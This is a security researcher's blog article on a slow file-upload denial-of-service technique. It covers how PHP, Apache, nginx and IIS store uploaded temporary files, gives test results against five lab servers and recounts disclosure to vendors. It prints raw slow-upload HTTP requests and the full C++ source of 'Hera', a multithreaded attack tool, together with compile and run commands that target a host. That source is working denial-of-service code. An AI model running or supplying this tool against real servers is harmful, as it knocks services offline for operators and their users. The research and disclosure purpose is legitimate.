Introduction

This article was originally planned to be a part of a larger project where a presentation at the developer conference Öredev was the second part. However, the presentation at Öredev got cancelled (I have stage fright so I don’t mind really). I have decided to put more energy into the writing part of this little project, do more tests and try to present some more interesting results.

The idea started with “People are so creative at messing up servers these days. I wanna do that”. And it ended in just that. People involved in some projects affected by this method have stated that they are either not vulnerable or that this attack is not dangerous and should not be considered a vulnerability. Some of these statements will be covered further down in the text. The first idea was born several years ago when I wrote a script called “Tsunami”, that simply bombs a server with file uploads. Not very efficient and I later abandoned the project as I could not get any interesting results out of it. The project was brought back to life not too long ago, and the very simple Tsunami script served as a base for the new Hera tool that will be described below.

TL;DR

By uploading a large number of files to different server setups and not finishing the uploads (using slow attack methods), one can get one or several of the following effects:

- Make server unresponsive or respond with an internal server error message

- Fill disk space resulting in different effects depending on server setup

- Use up RAM and crash whole server

Basically it comes down to the huge number of temporary files being saved on the disk, the massive number of file handles being opened, or the data being stored in RAM instead of on disk. How the different results above are reached depends heavily on what type of server is used and how it is set up. The following setups were tested and will be covered in this article.

- Windows Server with Apache

- Windows Server with IIS 7

- Linux server with Apache

- Linux server with Nginx

It should be noted that some of these effects are similar or identical to those of other attacks such as Slowloris or Slowpost. The difference is that some servers will handle file uploads differently and sometimes rather badly. This of course has different effects depending on the setup.

So here’s the thing

The original Tsunami script simply flooded a server with file uploads. The end result on a very low end machine was that the space ran out on the machine, eventually. But it was so extremely inefficient that it was not worth continuing the project. So this time I needed to figure out a way to keep the server from removing the files. For my initial testing when developing the tool I used an Apache with mod_php in Linux. Most settings were default apart from a few modifications to make the server allow more requests and in some cases be more stable, which you will see later on in this article when I list all the server results.

Now the interesting part about uploading a file to a server is that it has to store the data somewhere while the upload is being performed. Storing in RAM is usually very inefficient since it could lead to memory exhaustion very quickly (although some still do this, as you will see later in the results). Some will store the data in temporary files, which seems more reasonable. And in the case of mod_php, the data will be uploaded and stored in a temporary file before the data gets to your script/application. This was the first important thing I learned that made this slightly more exciting for me, because it means that as long as we have access to a PHP script on a server, any script, we can upload a file and store it temporarily. Of course the file will be removed when the script has finished running, which was the case with the Tsunami script (I made a script that ran very slowly, to test this out. Didn’t get very promising results either way).

The code responsible for the upload can be found here.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c

The RFC in question for reference

https://www.ietf.org/rfc/rfc1867.txt

This part is interesting, since I needed to make sure what the default setting was for file uploads. If the default was set to not allow file uploads, then this attack would be slightly less interesting.

    /* If file_uploads=off, skip the file part */
    if (!PG(file_uploads)) {
        skip_upload = 1;
    } else if (upload_cnt <= 0) {
        skip_upload = 1;
        sapi_module.sapi_error(E_WARNING, "Maximum number of allowable file uploads has been exceeded");
    }

Luckily it was set to on as default.

This means that given any standard Apache installation with mod_php enabled and at least one known PHP script reachable from the outside, this attack could be performed.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/main.c#L571

STD_PHP_INI_BOOLEAN("file_uploads", "1", PHP_INI_SYSTEM, OnUpdateBool, file_uploads, php_core_globals, core_globals)

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

    ; Whether to allow HTTP file uploads.
    ; http://php.net/file-uploads
    file_uploads = On

As seen here, the file is uploaded to a temporary folder (normally /tmp on Linux) with a “php” prefix.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c#L1021

    if (!cancel_upload) {
        /* only bother to open temp file if we have data */
        blen = multipart_buffer_read(mbuff, buff, sizeof(buff), &end);
    #if DEBUG_FILE_UPLOAD
        if (blen > 0) {
    #else
        /* in non-debug mode we have no problem with 0-length files */
        {
    #endif
            fd = php_open_temporary_fd_ex(PG(upload_tmp_dir), "php", &temp_filename, 1);
            upload_cnt--;
            if (fd == -1) {
                sapi_module.sapi_error(E_WARNING, "File upload error - unable to create a temporary file");
                cancel_upload = UPLOAD_ERROR_E;
            }
        }
    }
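The temporary names that show up in /tmp further down (php followed by six random characters) look like what POSIX mkstemp generates from a template ending in XXXXXX. The following is a minimal sketch of that naming scheme, assuming a mkstemp-style helper. makePrefixedTempFile is a made-up name for illustration and is not PHP's actual implementation.

```cpp
#include <cassert>
#include <cstdlib>
#include <string>
#include <unistd.h>

// Hypothetical helper: creates a uniquely named file "<dir>/<prefix>XXXXXX"
// with mkstemp and returns its path, or an empty string on failure.
// The descriptor is closed right away; the caller removes the file.
std::string makePrefixedTempFile(const std::string &dir, const std::string &prefix)
{
    std::string pathTemplate = dir + "/" + prefix + "XXXXXX";
    // mkstemp replaces the trailing XXXXXX in place, so it needs a writable buffer.
    int fd = mkstemp(&pathTemplate[0]);
    if (fd == -1) {
        return "";
    }
    close(fd);
    return pathTemplate;
}
```

Calling makePrefixedTempFile("/tmp", "php") returns a path of the form /tmp/phpXXXXXX with the six X characters replaced by random ones. The file stays on disk until something removes it, which is the property the rest of this article relies on.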

Checking a more recent version of PHP yields the same result.

Below is the latest commit as of 2016-10-20.

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

    ;;;;;;;;;;;;;;;;
    ; File Uploads ;
    ;;;;;;;;;;;;;;;;

    ; Whether to allow HTTP file uploads.
    ; http://php.net/file-uploads
    file_uploads = On

So now that I have confirmed the default settings in PHP, I can start experimenting with uploading files. A simple Apache installation on a Debian machine with mod_php enabled, and a test.php under /var/www/ should be enough. The test.php could theoretically be empty and this should work either way. Uploading a file is easy enough. Create a simple form in an HTML file and submit it with a file selected. Nothing new there. The file will get saved in /tmp and the information about the file will be passed on to test.php when it is called. Whether test.php does something with the file is irrelevant; it will still be deleted from /tmp once the script has finished. But we want it to stay in the /tmp folder for as long as possible.

After playing around in Burp for a while, I came to think about how Slowloris keeps a connection alive by sending headers very slowly, making the server prolong the timeout period for (sometimes) as long as the client wants. What if we could send a large file to the server and then not finish it, and have the server think we want to finish the upload by sending one byte at a time with very long intervals?

Sure enough, by setting a content-length header larger than the actual data we have uploaded, we can keep the file in /tmp for a long period as long as we send some data once in a while (depends on the timeout settings). The original content-length of the below request was 16881, but I set it to 168810 to make the server wait for the rest of the data.

    POST /test.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
    Connection: close
    Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
    Content-Length: 168810

    -----------------------------1825653778175343117546207648
    Content-Disposition: form-data; name="file"; filename="data.txt"
    Content-Type: text/plain

    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    ......
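To put a number on how much data the server is left waiting for in the request above, here is a small arithmetic sketch. The function names are made up for this example, and the one-byte and two-byte keep-alive sizes used in the note after the block are assumptions chosen only to illustrate the calculation.

```cpp
#include <cassert>
#include <cstdint>

// Bytes the server still expects: declared Content-Length minus bytes sent so far.
std::int64_t outstandingBytes(std::int64_t declaredLength, std::int64_t sentBytes)
{
    return declaredLength > sentBytes ? declaredLength - sentBytes : 0;
}

// Number of keep-alive sends of `chunk` bytes each before the declared
// length is reached (rounded up). Returns 0 for a non-positive chunk size.
std::int64_t sendsUntilComplete(std::int64_t outstanding, std::int64_t chunk)
{
    return chunk > 0 ? (outstanding + chunk - 1) / chunk : 0;
}
```

With the values from the request, outstandingBytes(168810, 16881) gives 151929 bytes that the server keeps waiting for. Sending one byte at a time would take 151929 sends to complete the request, and two bytes at a time would take 75965, so the connection stays open for as long as the server's timeout settings tolerate the pace.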

If we check /tmp we can see that the file is indeed there

    jimmy@Enma /tmp $ ls /tmp/php*
    /tmp/php5Ylw1J
    jimmy@Enma /tmp $ cat /tmp/php5Ylw1J
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    .....

The default settings allow us to upload a total of 20 files in the same request, with a max POST size of 8MB. This makes the attack more useful as we can open 20 file descriptors now instead of just 1 as I assumed before. In this first test I didn’t send any data after the first chunk, thus the files were removed when the request timed out. But all files sent were there for the duration of the request.

    POST /test.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
    Connection: close
    Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
    Content-Length: 168810

    -----------------------------1825653778175343117546207648
    Content-Disposition: form-data; name="file"; filename="data.txt"
    Content-Type: text/plain

    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    ......
    -----------------------------1825653778175343117546207648
    Content-Disposition: form-data; name="file"; filename="data.txt"
    Content-Type: text/plain

    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    ......
    -----------------------------1825653778175343117546207648
    Content-Disposition: form-data; name="file"; filename="data.txt"
    Content-Type: text/plain

    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    ......

Again, all files are saved as separate files in /tmp

    jimmy@Enma /tmp $ ls /tmp/php*
    /tmp/phpmESJII
    /tmp/phpQiDlOC
    /tmp/phps2zxLa

Okay fine, so it works. Now what?

Well, now that I can persist a number of files on the target system for the duration of the request (which I can prolong via a slow HTTP attack method), I need a tool that can use this to attack the target system. This is how the Hera tool was born (don’t put too much thought into the name, it made sense at first when a friend suggested it, but we can’t remember why).

    #define _GLIBCXX_USE_CXX11_ABI 0

    // Headers required by the code below
    #include <algorithm>
    #include <cstdlib>
    #include <cstring>
    #include <ctime>
    #include <iomanip>
    #include <iostream>
    #include <sstream>
    #include <string>
    #include <thread>
    #include <vector>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <unistd.h>

    using namespace std;

    /*
    ~=Compile=~
    g++ -std=c++11 -pthread main.cpp -o hera -lz

    ~=Run=~
    ./hera 192.168.0.209 80 5000 3 /test.php 0.03 20 0 0 20

    ~=Params=~
    ./hera host port threads connections path filesize files endfile gzip timeout

    ~=Increase maximum file descriptors=~
    vim /etc/security/limits.conf
    * soft nofile 65000
    * hard nofile 65000
    root soft nofile 65000
    root hard nofile 65000

    ~=Increase buffer size for larger attacks=~
    */

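    //Current local time as "YYYY-MM-DD HH:MM:SS"
    string getTime()
    {
        auto t = time(nullptr);
        auto tm = *localtime(&t);
        ostringstream out;
        out << put_time(&tm, "%Y-%m-%d %H:%M:%S");
        return out.str();
    }

    //Timestamped log line, prefixed with [+] for success and [-] for failure
    void print(string msg, bool mood)
    {
        string datetime = getTime();
        if(mood)
        {
            cout << "[+][" << datetime << "] " << msg << endl;
        }
        else
        {
            cout << "[-][" << datetime << "] " << msg << endl;
        }
    }

    //Pointer to the IPv4 or IPv6 address inside a sockaddr
    void *get_in_addr(struct sockaddr *sa)
    {
        if (sa->sa_family == AF_INET) {
            return &(((struct sockaddr_in*)sa)->sin_addr);
        }
        return &(((struct sockaddr_in6*)sa)->sin6_addr);
    }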

    int doConnect(string *payload, string *host, string *port)
    {
        int sockfd = -1;
        struct addrinfo hints, *servinfo, *p = NULL;
        int rv;

        memset(&hints, 0, sizeof hints);
        hints.ai_family = AF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;

        if ((rv = getaddrinfo(host->c_str(), port->c_str(), &hints, &servinfo)) != 0)
        {
            print("Unable to get host information", false);
            //servinfo is not valid here, so there is nothing to connect to
            return -1;
        }

        //Keep trying the resolved addresses until one of them accepts the connection
        while(!p)
        {
            for(p = servinfo; p != NULL; p = p->ai_next)
            {
                if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1)
                {
                    print("Unable to create socket", false);
                    continue;
                }
                if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1)
                {
                    close(sockfd);
                    print("Unable to connect", false);
                    continue;
                }
                break;
            }
        }

        //The address list is no longer needed once connected
        freeaddrinfo(servinfo);

        int failures = 0;
        while(send(sockfd, payload->c_str(), payload->size(), MSG_NOSIGNAL) < 0)
        {
            if(++failures == 5)
            {
                close(sockfd);
                return -1;
            }
        }
        return sockfd;
    }

    void attacker(string *payload, string *host, string *port, int numConns, bool gzip, int timeout)
    {
        //One descriptor per connection; 0 means "not connected yet"
        vector<int> sockfd(numConns, 0);
        string data = "a\n";

        while(true)
        {
            //(Re)open every connection that is not currently established
            for(int i = 0; i < numConns; ++i)
            {
                if(sockfd[i] <= 0)
                {
                    sockfd[i] = doConnect(payload, host, port);
                }
            }

            //Send a little continuation data to keep each request alive
            for(int i = 0; i < numConns; ++i)
            {
                if(send(sockfd[i], data.c_str(), data.size(), MSG_NOSIGNAL) < 0)
                {
                    close(sockfd[i]);
                    sockfd[i] = doConnect(payload, host, port);
                }
            }

            sleep(timeout);
        }
    }

    string gen_random(int len)
    {
        char alphanum[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
        int alphaLen = sizeof(alphanum) - 1;
        string str = "";
        for(int i = 0; i < len; ++i)
        {
            str += alphanum[rand() % alphaLen];
        }
        return str;
    }

    string buildPayload(string host, string path, float fileSize, int numFiles, bool endFile, bool gzip)
    {
        ostringstream payload;
        ostringstream body;
        int extraContent = (endFile) ? 0 : 100000;

        //Build the body
        for(int i = 0; i < numFiles; ++i)
        {
            body << "-----------------------------424199281147285211419178285\r\n";
            body << "Content-Disposition: form-data; name=\"" << gen_random(10) << "\"; filename=\"" << gen_random(10) << ".txt\"\r\n";
            body << "Content-Type: text/plain\r\n\r\n";
            for(int n = 0; n < (int)(fileSize*100000); ++n)
            {
                body << "aaaaaaaaa\n";
            }
        }

        //If we want to end the stream of files, add ending boundary
        if(endFile)
        {
            body << "-----------------------------424199281147285211419178285--";
        }

        //Build headers
        payload << "POST " << path.c_str() << " HTTP/1.1\r\n";
        payload << "Host: " << host.c_str() << "\r\n";
        payload << "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\r\n";
        payload << "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        payload << "Accept-Language: en-US,en;q=0.5\r\n";
        payload << "Accept-Encoding: gzip, deflate\r\n";
        payload << "Cache-Control: max-age=0\r\n";
        payload << "Connection: keep-alive\r\n";
        payload << "Content-Type: multipart/form-data; boundary=---------------------------424199281147285211419178285\r\n";
        payload << "Content-Length: " << body.str().size()+extraContent << "\r\n\r\n";
        payload << body.str() << "\r\n";

        return payload.str();
    }

    void help()
    {
        string help =
            "./hera host port threads connections path filesize files endfile gzip timeout\n\n"
            "host\t\tHost to attack\n"
            "port\t\tPort to connect to\n"
            "threads\t\tNumber of threads to start\n"
            "connections\tConnections per thread\n"
            "path\t\tPath to post data to\n"
            "filesize\tSize per file in MB\n"
            "files\t\tNumber of files per request (Min 1)\n"
            "endfile\t\tEnd the last file in the request (0/1)\n"
            "gzip\t\tEnable or disable gzip compression\n"
            "timeout\t\tTimeout between sending of continuation data (to keep connection alive)\n";
        cout << help;
    }

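    int main(int argc, char *argv[])
    {
        cout << "~=Hera 0.7=~\n\n";

        if(argc < 11)
        {
            help();
            return 0;
        }

        //Arguments in the order listed by help()
        string host = argv[1];
        string port = argv[2];
        int numThreads = atoi(argv[3]);
        int numConns = atoi(argv[4]);
        string path = argv[5];
        float fileSize = stof(argv[6]);
        int numFiles = atoi(argv[7]) > 0 ? atoi(argv[7]) : 2;
        bool endFile = atoi(argv[8]) == 1 ? true : false;
        bool gzip = atoi(argv[9]) == 1 ? true : false;
        float timeout = stof(argv[10]) < 0.1 ? 0.1 : stof(argv[10]);

        vector<thread> threadVector;

        print("Building payload", true);
        srand(time(0));
        string payload = buildPayload(host, path, fileSize, numFiles, endFile, gzip);
        //cout << payload << endl;

        print("Starting threads", true);
        for(int i = 0; i < numThreads; ++i)
        {
            threadVector.push_back(thread(attacker, &payload, &host, &port, numConns, gzip, timeout));
            //0.1 s pause between thread starts; sleep() only takes whole seconds
            usleep(100000);
        }

        for(int i = 0; i < numThreads; ++i)
        {
            threadVector[i].join();
        }
    }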

The version above is an older one, and if you want to test out the tool I recommend that you clone the repository from github (which is linked above). The newest version has support for gzip. However, the gzip experiment did not produce the results I expected, so support for sending gzip compressed data with the tool will be removed in the future. The tool compiles and works just fine as it is right now though. As the idea is to open a ton of connections to a target server, it is essential that you increase the number of file descriptors that you can use in the system. This is usually set to something around 1024. The limit I have set in the example below is arbitrary; it just needs to be high enough that you never reach it, because then the test might fail.

/etc/security/limits.conf

    * soft nofile 65000
    * hard nofile 65000
    root soft nofile 65000
    root hard nofile 65000

This is also covered in the readme on github that I linked earlier.
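Before starting a run it can be handy to check whether the current limit actually covers the number of sockets the tool will open. The sketch below is not part of Hera; the function names are made up for this example and it assumes a POSIX system where getrlimit with RLIMIT_NOFILE is available.

```cpp
#include <cassert>
#include <sys/resource.h>

// Sockets the tool will try to keep open: one per connection in every thread.
unsigned long long socketsNeeded(unsigned long long threads, unsigned long long connsPerThread)
{
    return threads * connsPerThread;
}

// True if the soft limit on open file descriptors for this process is at
// least `needed`. Returns false if the limit cannot be read.
bool hasEnoughDescriptors(unsigned long long needed)
{
    struct rlimit lim;
    if (getrlimit(RLIMIT_NOFILE, &lim) != 0) {
        return false;
    }
    if (lim.rlim_cur == RLIM_INFINITY) {
        return true;
    }
    return static_cast<unsigned long long>(lim.rlim_cur) >= needed;
}
```

For the example run in the source comment (5000 threads with 3 connections each), socketsNeeded(5000, 3) is 15000, which is far above a typical default of around 1024. The check ignores descriptors the process already has open, so leave some margin.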

Okay so how does this affect different servers?

Together with a colleague (Stefan Ivarsson), a number of tests were made and documented to see what effects this has on different systems. The effects differ quite a bit, and if you want to find out whether this works on your own setup, the best way is to simply test it in a safe environment (like a test server that is separated from your production environment).

Setup 1

Operating system: Debian (Jessie, VirtualBox)

Web server: Apache (2.4.10)

Scripting module: mod_php (PHP 5.6.19-0+deb8u1)

Max allowed files per request: 20 (Default)

Max allowed post size: 8 MB (Default)

RAM: 2GB

CPU Core: 1

HDD: 8GB

So basically what this meant for the test was that I could set my tool to send 20 files per request with a max size of 0.4 MB, but to give some margin for headers and such, I set it to 0.3 MB per file. There are two different ways that I wanted to test this attack. The first one is to send as large files as possible, which would fill up disk space and hopefully disrupt services as the machine ran out of space. The second way was to send as many small files as possible and make the server stressed by opening too many file handles. As it turns out, both methods are good for different servers and setups and will prove fatal for the server depending on certain factors (setup, RAM, bandwidth, space etc).



So during the test with the above setup, I set the Hera tool to attack using 2500 threads and 2 sockets per thread. There were 20 files per request and each file was set to 0.3MB. This is 30GB worth of data being sent to the server, so if it doesn’t dispose of that information it will have to save it either on disk or in RAM, neither of which is large enough. What happened was rather expected actually.
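The numbers in this setup can be checked with a few lines of arithmetic. The sketch below is illustrative only: the struct and function names are made up for this example, and it assumes 1 MB = 1,000,000 bytes and 1 GB = 1000 MB.

```cpp
#include <cassert>

// Rough size of one run, derived from the command line parameters.
struct AttackVolume {
    long long connections;  // threads * connections per thread
    long long tempFiles;    // connections * files per request
    double totalMB;         // tempFiles * size per file
};

AttackVolume estimateVolume(int threads, int connsPerThread, int filesPerRequest, double fileSizeMB)
{
    AttackVolume v;
    v.connections = static_cast<long long>(threads) * connsPerThread;
    v.tempFiles = v.connections * filesPerRequest;
    v.totalMB = static_cast<double>(v.tempFiles) * fileSizeMB;
    return v;
}

// Largest file size that still fits when the POST size limit is split
// evenly over the files in one request (headers not accounted for).
double perFileBudgetMB(double postMaxMB, int filesPerRequest)
{
    return filesPerRequest > 0 ? postMaxMB / filesPerRequest : 0.0;
}
```

With 2500 threads, 2 sockets per thread, 20 files per request and 0.3 MB per file, this gives 5000 connections, 100000 temporary files and roughly 30000 MB, which is the 30GB mentioned above. perFileBudgetMB(8, 20) gives the 0.4 MB per-file ceiling that the 0.3 MB setting stays under.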

It should be noted that the default Apache installation allowed very few connections to be open, leading to a normal Slowloris effect. This is not what I was after and so I configured the server to allow more connections (each thread is about 1MB with this setup making it very inefficient, but don’t worry there are more test results further down). The server ran out of memory because of too many spawned Apache processes.

When the RAM was raised the space eventually ran out on the server.



As expected the number of files in the tmp folder exploded and kept the server CPU usage up during the whole time (until the disk space ran out of course in which case no more files could be created).

During the attack the Apache server was unresponsive from the outside, and when the HDD space ran out it became responsive again.

An interesting effect here was actually when I decided to halt the attack. This resulted in the CPU going up to 100% since the machine had to kill all the processes and remove all of the files. So I took this chance to immediately start the attack again to see what would happen. It would stay up at 100% CPU and continue its attempt to remove the files and processes while I was forcing it to create new ones at the same time.

Setup 2

Operating system: Windows Server 2012 (VirtualBox)

Web server: Apache (WAMP)

Scripting module: mod_php (PHP 5)

Max allowed files per request: 20 (Default)

Max allowed post size: 8 MB (Default)

RAM: 4GB

CPU Core: 1

HDD: 25GB

This test was conducted in a similar manner as the first one. It resulted in Apache being killed because it ate too much memory. The disk space also ran out after a while. The system became very unstable and applications got killed one after another to preserve memory (Firefox and the task manager for example). At first the same effect was reached as the connection pool ran out, but increasing the limit “fixed” that. The mpm_winnt_module was used in the first test. A more robust setup will be presented in a later test.



As you can see in the image above, the tmp files are created and persist throughout the test as expected.

The system starts killing processes when the RAM starts running out, so we are still seeing effects similar to those of a normal Slowloris attack (that is, the Apache processes are taking up a lot of memory for every thread started, which is nothing new).

But we are still getting our desired effect of a huge number of files being uploaded and filling up the disk space, so that still works. After increasing the virtual machine's RAM to 8GB the Apache server did not get killed during the attack. The server was mostly unresponsive during the attack, and by setting the timeout of the tool very low and the size of the files very small, the server CPU load could be kept at around 90-100% constantly (since it was creating and removing thousands of files all the time). At one point the Apache process stopped accepting any connections, even after the attack had stopped. This could not be reproduced very easily, so I have yet to verify the cause. Another interesting effect of the attack was that the memory usage went up to 2.5-3GB and never went down again after the attack had finished (trying to create a dump of the memory of the Apache process after the attack heavily messed up the machine, so I gave up on that for now).

The picture above was taken when the process became unresponsive and stopped accepting connections. That cannot be seen in the picture itself; what it shows is the memory usage several minutes after the attack had stopped.

Setup 3

Operating system: Debian (VirtualBox)

Web server: nginx

Scripting module: PHP-FPM (PHP 5)

Max allowed files per request: 20 (Default)

Max allowed post size: 1 MB (Default)

RAM: 4GB

CPU Core: 1

HDD: 25GB

In this test I tried the same tactic as before. One thing that I immediately noticed was that with a lot of connections and few files per request, the max allowed connections was hit pretty fast (which is not surprising).



But with a lot of small files per request, something more interesting happened instead. It seemed to hit a limit on the maximum number of open files, which resulted in a 500 internal server error instead of a refused connection. Setting a small number of files but increasing the file size appeared to have the same effect, however. So this is probably the same effect as a Slowpost attack.

Changing worker_connections in /etc/nginx/nginx.conf to a higher value mostly fixed the first problem, where opening a lot of Slowloris-like connections (with only a small number of files) exhausted the connection limit. But increasing the number of files to the maximum (20) per request quickly downed the server again, showing only an internal server error message. Changing the size of the data sent also had this effect of course.

One thing I noticed was that nginx does not hand over the data to PHP until the request has finished transmitting. This does not stop the creation of files, since nginx needs to create temporary files as well. But it does stop the large number of files being created, as nginx will only create one file per request instead of a maximum of 20 like with mod_php.

Setup 4

Operating system: Windows Server 2012 (VirtualBox)

Web server: IIS 8

Scripting module: ASP.NET

RAM: 4GB

CPU Core: 1

HDD: 25GB

This test ended very similarly to the nginx one. The server seemed to save the data in a single temporary file and did not seem to have a lot of problems with the number of connections to the server. In the end, when maxing out the attack from the attacking test machine, the web server became unresponsive about 8 times out of 10. This was most likely more of a Slowloris/Slowpost type of effect than a result of a lot of files being created. More tests could be made on this setup to further investigate methods of bringing the server down, but because of the relatively bad result (compared to the other setups) I decided to leave it at that for now. The server can be stressed, no doubt about that, but not in the way that I intended for this experiment.

Setup 5

Operating system: Debian (Amazon EC2, m4.xlarge)

Web server: Apache

Scripting module: PHP-FPM (PHP 7)

Max allowed files per request: 20 (Default)

Max allowed post size: 8 MB (Default)

RAM: 16GB

CPU Core: 1

HDD: 30GB

This test was very special and was the last very big test I wanted to make. The goal of the test was to try the attack method on a larger, more realistic setup in the cloud. To do this I took the help of Werner Kwiatkowski over at http://rustytub.com who (in exchange for candy, herring and beverage) helped me to set up a realistic and stable server that could take a punch.

The first problem I had as the attacker was that the server would only create a single temporary file per request, instead of a maximum of 20 like I was expecting. The second “problem” was that the server became unresponsive in a Slowloris/Slowpost kind of manner instead of being affected by my many uploaded files. This was because Werner had set it up so that the server would rather become unresponsive than crash catastrophically. This is of course preferred and defeated my tool in a way. So, to get my desired effect I actually had to raise the max allowed connections of the server a lot so that I could see the effects of all the files being created. This of course differs from my initial idea of only testing near default setups, but I felt it could be important to have some more realistic samples as well. And yes, I used hackme.biz for the final test.

The number of files specified above seemed to be the max I could reach. However, after the limit was reached something very interesting happened. The server appeared to store the files that could not be written to temporary files in memory instead. This made the RAM usage go completely out of control very quickly. It took a while for the attack to actually use up all of that RAM, but after about 30 minutes or so, it had finally managed to fill it all up.

The image above was taken about a minute before the server stopped responding and crashed because of memory exhaustion.

Logging into the AWS account and checking the EC2 instances makes it more clear that the node has crashed. Now, of course this could still mean that the effects we are seeing are still the effects of a Slowloris attack where the processes created are the ones using up all the memory. So to test that I did the same test with a Slowloris attack tool with this setup. The result was actually not that impressive even when I tried using more connections than with the Hera tool.

As you can see the memory usage for the same amount of threads/connections used is not even close. That is because this particular setup is not vulnerable to the normal Slowloris attack, nor is it vulnerable to Slowpost (I did not try Slowread and other slow attacks).

This time dumping memory was a lot easier so I could check if the data was still stored in memory even after the attack was in idle mode (As in, it was not currently transmitting a lot of data and was simply waiting for the timeout to occur). The data from the payload could be found in the process memory which explains why the RAM usage went out of control like it did. I have not investigated this any further though.

So, in summary

I would like to think that this method could be used for some pretty bad stuff. It’s not an entirely new attack method but rather a new way of performing slow attacks against servers that handle file uploads in a bad way. Not all of the setups were vulnerable to this method, but most of them were either vulnerable to it or vulnerable to other slow attacks, which became apparent during the tests (for example Slowpost on nginx setups).

This method can be used in other ways than crashing servers. It can be used in an attack to guess temporary file names when you only have a file inclusion vulnerability at your disposal. You can read the start of that project here.

When I started playing around with this method I contacted Apache, PHP and Red Hat to see what they had to say about it. Apache said it does not directly affect them (which is true since in the case of mod_php that is in the hands of the PHP team). PHP said that it was not a security issue and that file uploads are not turned on by default. If you read the article you will see that this is just not true, and I have asked them to clarify what they mean by that, without getting an answer. Red Hat were extremely helpful and even set up a test machine for the tool where they could see the effects. However, they did not deem this a vulnerability and closed the case. I still think it’s an interesting method and I also feel like it should be okay for me to post this now without regretting it later due to breaking any responsible disclosure policies.

Thanks for reading!
